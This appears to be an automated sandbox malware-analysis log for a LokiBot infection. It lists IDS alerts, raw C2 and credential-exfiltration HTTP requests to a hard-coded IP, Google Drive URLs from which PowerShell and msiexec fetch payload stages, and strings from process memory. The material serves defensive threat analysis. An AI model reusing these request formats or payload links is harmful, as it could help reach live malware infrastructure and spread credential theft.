                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49719 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49719 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49717 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49716 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49732 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49732 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49728 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49728 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49728 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49735 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49735 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49725 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49725 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49733 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49725 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49746 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49739 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49739 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49739 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49746 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49739 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49718 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49718 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49746 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49725 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49746 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49741 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49741 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49741 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49741 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49738 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49738 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49738 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49738 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49737 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49737 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49737 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49737 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49735 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49735 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49747 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49747 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49747 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49747 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49729 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49729 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49729 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49729 -> 137.184.191.215:80
                Source: Joe Sandbox ViewIP Address: 137.184.191.215 137.184.191.215
                Source: Joe Sandbox ViewASN Name: PANDGUS PANDGUS
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49714 -> 142.250.184.238:443
                Source: global trafficHTTP traffic detected: GET /uc?export=download&id=11zMzzwH9HUCNK53AgFrbF7XiFnfq8b_u HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /download?id=11zMzzwH9HUCNK53AgFrbF7XiFnfq8b_u&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /download?id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 180Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 180Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 153Connection: close
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: global trafficHTTP traffic detected: GET /uc?export=download&id=11zMzzwH9HUCNK53AgFrbF7XiFnfq8b_u HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /download?id=11zMzzwH9HUCNK53AgFrbF7XiFnfq8b_u&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /download?id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: drive.google.com
                Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                Source: unknownHTTP traffic detected: POST /index.php/check.php?s=am9ntjjw HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 1A0CD362Content-Length: 180Connection: close
                Source: msiexec.exe, 00000007.00000002.3324895722.0000000000B8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://137.184.191.215/index.php/check.php?s=am9ntjjw
                Source: msiexec.exe, 00000007.00000002.3324895722.0000000000B8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://137.184.191.215/index.php/check.php?s=am9ntjjwY
                Source: powershell.exe, 00000005.00000002.3049164389.0000000006FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                Source: powershell.exe, 00000005.00000002.3049164389.0000000006FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                Source: powershell.exe, 00000002.00000002.2241557151.00000297D77ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
                Source: powershell.exe, 00000002.00000002.2241557151.00000297D7826000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
                Source: powershell.exe, 00000002.00000002.2273173018.00000297E5ADD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3043556156.00000000054D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000005.00000002.3029993091.00000000045C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000002.00000002.2241557151.00000297D5A71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3029993091.0000000004471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000005.00000002.3029993091.00000000045C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000002.00000002.2241557151.00000297D5A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000005.00000002.3029993091.0000000004471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBeq
                Source: powershell.exe, 00000002.00000002.2241557151.00000297D780F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D5F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D77ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D7813000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2423603656.0000000000BBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
                Source: powershell.exe, 00000005.00000002.3043556156.00000000054D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000005.00000002.3043556156.00000000054D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000005.00000002.3043556156.00000000054D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000002.00000002.2241557151.00000297D77E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googPB
                Source: powershell.exe, 00000002.00000002.2241557151.00000297D5C97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D74A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
                Source: msiexec.exe, 00000007.00000002.3324895722.0000000000B4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
                Source: powershell.exe, 00000002.00000002.2280020509.00000297EE1A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=11zMzzwH9HUCNK53AgFrbF7XiFnfq8b_u32
                Source: powershell.exe, 00000002.00000002.2241557151.00000297D5C97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=11zMzzwH9HUCNK53AgFrbF7XiFnfq8b_uP
                Source: powershell.exe, 00000005.00000002.3029993091.00000000045C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=11zMzzwH9HUCNK53AgFrbF7XiFnfq8b_uXR
                Source: msiexec.exe, 00000007.00000002.3324895722.0000000000B4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt
                Source: powershell.exe, 00000002.00000002.2241557151.00000297D7813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh
                Source: powershell.exe, 00000002.00000002.2241557151.00000297D7813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
                Source: msiexec.exeString found in binary or memory: https://drive.usercontent.google.com/
                Source: powershell.exe, 00000002.00000002.2241557151.00000297D5F05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D7813000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=11zMzzwH9HUCNK53AgFrbF7XiFnfq8b_u&export=download
                Source: msiexec.exe, 00000007.00000003.2423603656.0000000000BBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lSqiaJ46oNlphq9JFrSKXLLdPu84s4pt&export=download
                Source: powershell.exe, 00000002.00000002.2241557151.00000297D5F05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.coma
                Source: powershell.exe, 00000005.00000002.3029993091.00000000045C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000002.00000002.2241557151.00000297D6650000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 00000002.00000002.2273173018.00000297E5ADD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3043556156.00000000054D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000002.00000002.2241557151.00000297D780F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D5F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D77ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D7813000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2423603656.0000000000BBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
